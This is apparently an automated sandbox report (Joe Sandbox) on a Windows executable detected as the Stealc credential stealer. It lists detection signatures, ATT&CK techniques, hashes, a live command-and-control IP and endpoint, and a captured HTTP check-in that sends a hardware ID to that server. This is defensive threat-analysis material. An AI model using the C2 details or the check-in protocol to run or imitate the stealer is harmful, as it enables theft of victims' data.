                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A9750 mov eax, dword ptr fs:[00000030h]0_2_007A9750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_007A7850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6552, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_007A9600
                Source: file.exeBinary or memory string: U) VProgram Manager
                Source: file.exe, 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: VProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_007A7B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A6920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_007A6920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_007A7850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_007A7A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.790000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1789228980.00000000014AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1743679514.0000000005160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6552, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.790000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1789228980.00000000014AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1743679514.0000000005160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6552, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe55%VirustotalBrowse
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                bg.microsoft.map.fastly.net
                		199.232.210.172
                		truefalse
                  		unknown
                  fp2e7a.wpc.phicdn.net
                  		192.229.221.95
                  		truefalse
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://185.215.113.37/true
                    • URL Reputation: malware
                    		unknown
                    http://185.215.113.37/e2b1563c6670f193.phptrue
                    • URL Reputation: malware
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.37/e2b1563c6670f193.phplfile.exe, 00000000.00000002.1789228980.0000000001509000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.37file.exe, 00000000.00000002.1789228980.00000000014AE000.00000004.00000020.00020000.00000000.sdmptrue
                      • URL Reputation: malware
                      		unknown
                      http://185.215.113.37/9file.exe, 00000000.00000002.1789228980.0000000001509000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown
                        http://185.215.113.37/e2b1563c6670f193.phpTfile.exe, 00000000.00000002.1789228980.0000000001509000.00000004.00000020.00020000.00000000.sdmptrue
                          		unknown
                          http://185.215.113.37/e2b1563c6670f193.php(file.exe, 00000000.00000002.1789228980.0000000001509000.00000004.00000020.00020000.00000000.sdmptrue
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            185.215.113.37
                            		unknownPortugal
                            		206894WHOLESALECONNECTIONSNLtrue

                            General Information

                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1530693
                            Start date and time:2024-10-10 12:04:08 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 3m 16s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:2
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:file.exe
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@1/0@0/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 80%
                            • Number of executed functions: 19
                            • Number of non-executed functions: 80
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Stop behavior analysis, all processes terminated

                            Warnings

                            • Exclude process from analysis (whitelisted): SIHClient.exe
                            • Excluded IPs from analysis (whitelisted): 20.109.210.53, 20.242.39.171
                            • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, ocsp.edge.digicert.com, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                            • Report size getting too big, too many NtQueryValueKey calls found.

                            Simulations

                            Behavior and APIs

                            No simulations

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            185.215.113.37file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            zYlQoif21X.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, StealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php

                            Domains

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            bg.microsoft.map.fastly.nethttps://loadfile.komanda.cl/Get hashmaliciousUnknownBrowse
                            • 199.232.210.172
                            file.exeGet hashmaliciousCredential FlusherBrowse
                            • 199.232.214.172
                            https://or4t.iednationusa.com/sYyRdjOUGet hashmaliciousUnknownBrowse
                            • 199.232.214.172
                            https://w7950.app.blinkops.comGet hashmaliciousUnknownBrowse
                            • 199.232.214.172
                            #U8a62#U50f9 (RFQ) -RFQ20241010.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                            • 199.232.210.172
                            5y3FUtMSB5.exeGet hashmaliciousQuasarBrowse
                            • 199.232.210.172
                            https://aboriginal-investment-proposal.squarespace.com/Get hashmaliciousUnknownBrowse
                            • 199.232.214.172
                            https://embassyatlantahub.com/res444.php?4-68747470733a2f2f632e7468696d65726e65742e636f6d2f623174462f-#mGet hashmaliciousUnknownBrowse
                            • 199.232.210.172
                            http://www.cottesloecounselling.com.au/anna-amhrose.htmlGet hashmaliciousUnknownBrowse
                            • 199.232.214.172
                            https://dlce.cc/fbacdcb212bcbb323077d5a99ef04c07Get hashmaliciousUnknownBrowse
                            • 199.232.214.172
                            fp2e7a.wpc.phicdn.netfile.exeGet hashmaliciousCredential FlusherBrowse
                            • 192.229.221.95
                            http://growthsparkplus.thsite.top/?email=anna@cellnextelecom.comGet hashmaliciousUnknownBrowse
                            • 192.229.221.95
                            file.exeGet hashmaliciousCredential FlusherBrowse
                            • 192.229.221.95
                            https://or4t.iednationusa.com/sYyRdjOUGet hashmaliciousUnknownBrowse
                            • 192.229.221.95
                            https://allpremio.privatepilot.de/allpremio/zdfGet hashmaliciousUnknownBrowse
                            • 192.229.221.95
                            https://aboriginal-investment-proposal.squarespace.com/Get hashmaliciousUnknownBrowse
                            • 192.229.221.95
                            http://blacksaltys.comGet hashmaliciousUnknownBrowse
                            • 192.229.221.95
                            https://embassyatlantahub.com/res444.php?4-68747470733a2f2f632e7468696d65726e65742e636f6d2f623174462f-#mGet hashmaliciousUnknownBrowse
                            • 192.229.221.95
                            http://www.cottesloecounselling.com.au/anna-amhrose.htmlGet hashmaliciousUnknownBrowse
                            • 192.229.221.95
                            https://dlce.cc/fbacdcb212bcbb323077d5a99ef04c07Get hashmaliciousUnknownBrowse
                            • 192.229.221.95

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            zYlQoif21X.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, StealcBrowse
                            • 185.215.113.103
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            No created / dropped files found

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.949584439885787
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:file.exe
                            File size:1'860'096 bytes
                            MD5:6a6d66291698792c3e6764ec5dd4e0ff
                            SHA1:dd9d3a54a2016c6b6e049f43fca9fcccedc89493
                            SHA256:0daf657523ba709f5c99af228de6b06699c6ddba2bfc4be766baae3027740602
                            SHA512:901f9a0bd145d3fd2dd39abd7a82ca3af3c5e2767ec92b3c23dbd4f3b507f0222a667ab37c8673e76029b3fb5d655164356afa6d3409c53f5b320ec0b9d54908
                            SSDEEP:49152:ppTh0S9sfMyzc71ONaO+ppKdXQTqpRKK:ppN0S9sRc78IBp33
                            TLSH:FD85331D8CDDC5B2D88AF87E9AA30B5B8F049FB1A5D0E7466817046D686FC18A3F13D1
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                            File Icon

                            Icon Hash:90cececece8e8eb0

                            Static PE Info

                            General

                            Entrypoint:0xaa0000
                            Entrypoint Section:.taggant
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                            Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
                            Import Hash:2eabe9054cad5152567f0699947a2c5b

                            Entrypoint Preview

                            Instruction
                            jmp 00007FB9B07E303Ah
                            cmovo ebx, dword ptr [eax+eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            jmp 00007FB9B07E5035h
                            add byte ptr [edx+ecx], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            xor byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add dword ptr [eax], eax
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            or al, 80h
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add al, 0Ah
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            xor byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            or byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            and al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add dword ptr [eax+00000000h], eax
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add al, 0Ah
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            xor byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            or al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add dword ptr [eax+00000000h], eax
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add dword ptr [edx], ecx
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            inc eax
                            or al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax+eax*4], cl
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al

                            Rich Headers

                            Programming Language:
                            • [C++] VS2010 build 30319
                            • [ASM] VS2010 build 30319
                            • [ C ] VS2010 build 30319
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [LNK] VS2010 build 30319

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            0x10000x25b0000x228004c43f8ce20574c250ee74f71fdf10febunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            0x25e0000x2a10000x2007ba9eb7fdeb80c88d79451c0305218a0unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            vppxldjh0x4ff0000x1a00000x19fe00ae1dbddbc3aa9255a3504875243468a3False0.9950000704463481data7.954340444718931IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            xcnejhbt0x69f0000x10000x600d855dd6605553dff179340b91c34dc11False0.5846354166666666data5.049353171576456IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .taggant0x6a00000x30000x2200f232d6e58102f6ac3a0970d887f17cd3False0.05767463235294118DOS executable (COM)0.6847144094131307IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                            Imports

                            DLLImport
                            kernel32.dlllstrcpy

                            Network Behavior

                            Suricata IDS Alerts

                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                            2024-10-10T12:05:09.806519+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449730185.215.113.3780TCP

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Oct 10, 2024 12:05:08.782653093 CEST4973080192.168.2.4185.215.113.37
                            Oct 10, 2024 12:05:08.787868023 CEST8049730185.215.113.37192.168.2.4
                            Oct 10, 2024 12:05:08.787975073 CEST4973080192.168.2.4185.215.113.37
                            Oct 10, 2024 12:05:08.788101912 CEST4973080192.168.2.4185.215.113.37
                            Oct 10, 2024 12:05:08.792913914 CEST8049730185.215.113.37192.168.2.4
                            Oct 10, 2024 12:05:09.497402906 CEST8049730185.215.113.37192.168.2.4
                            Oct 10, 2024 12:05:09.497935057 CEST4973080192.168.2.4185.215.113.37
                            Oct 10, 2024 12:05:09.575400114 CEST4973080192.168.2.4185.215.113.37
                            Oct 10, 2024 12:05:09.580461025 CEST8049730185.215.113.37192.168.2.4
                            Oct 10, 2024 12:05:09.806205034 CEST8049730185.215.113.37192.168.2.4
                            Oct 10, 2024 12:05:09.806519032 CEST4973080192.168.2.4185.215.113.37
                            Oct 10, 2024 12:05:14.107316971 CEST4973080192.168.2.4185.215.113.37

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Oct 10, 2024 12:05:21.216856956 CEST1.1.1.1192.168.2.40xbbf9No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                            Oct 10, 2024 12:05:21.216856956 CEST1.1.1.1192.168.2.40xbbf9No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                            Oct 10, 2024 12:05:22.528201103 CEST1.1.1.1192.168.2.40x1a89No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                            Oct 10, 2024 12:05:22.528201103 CEST1.1.1.1192.168.2.40x1a89No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false

                            HTTP Request Dependency Graph

                            • 185.215.113.37

                            HTTP Packets

                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.449730185.215.113.37806552C:\Users\user\Desktop\file.exe
                            TimestampBytes transferredDirectionData
                            Oct 10, 2024 12:05:08.788101912 CEST89OUTGET / HTTP/1.1
                            Host: 185.215.113.37
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Oct 10, 2024 12:05:09.497402906 CEST203INHTTP/1.1 200 OK
                            Date: Thu, 10 Oct 2024 10:05:09 GMT
                            Server: Apache/2.4.52 (Ubuntu)
                            Content-Length: 0
                            Keep-Alive: timeout=5, max=100
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Oct 10, 2024 12:05:09.575400114 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                            Content-Type: multipart/form-data; boundary=----AAFBAKECAEGCBFIEGDGI
                            Host: 185.215.113.37
                            Content-Length: 211
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Data Raw: 2d 2d 2d 2d 2d 2d 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 34 33 45 38 30 35 35 32 44 35 36 31 31 36 36 31 37 30 34 33 30 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 49 2d 2d 0d 0a
                            Data Ascii: ------AAFBAKECAEGCBFIEGDGIContent-Disposition: form-data; name="hwid"443E80552D561166170430------AAFBAKECAEGCBFIEGDGIContent-Disposition: form-data; name="build"doma------AAFBAKECAEGCBFIEGDGI--
                            Oct 10, 2024 12:05:09.806205034 CEST210INHTTP/1.1 200 OK
                            Date: Thu, 10 Oct 2024 10:05:09 GMT
                            Server: Apache/2.4.52 (Ubuntu)
                            Content-Length: 8
                            Keep-Alive: timeout=5, max=99
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Data Raw: 59 6d 78 76 59 32 73 3d
                            Data Ascii: YmxvY2s=


                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            System Behavior

                            General

                            Target ID:0
                            Start time:06:05:03
                            Start date:10/10/2024
                            Path:C:\Users\user\Desktop\file.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\file.exe"
                            Imagebase:0x790000
                            File size:1'860'096 bytes
                            MD5 hash:6A6D66291698792C3E6764EC5DD4E0FF
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1789228980.00000000014AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1743679514.0000000005160000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:true

                            Disassembly

                            Reset < >

                              Execution Graph

                              Execution Coverage:8.8%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:9.7%
                              Total number of Nodes:2000
                              Total number of Limit Nodes:24
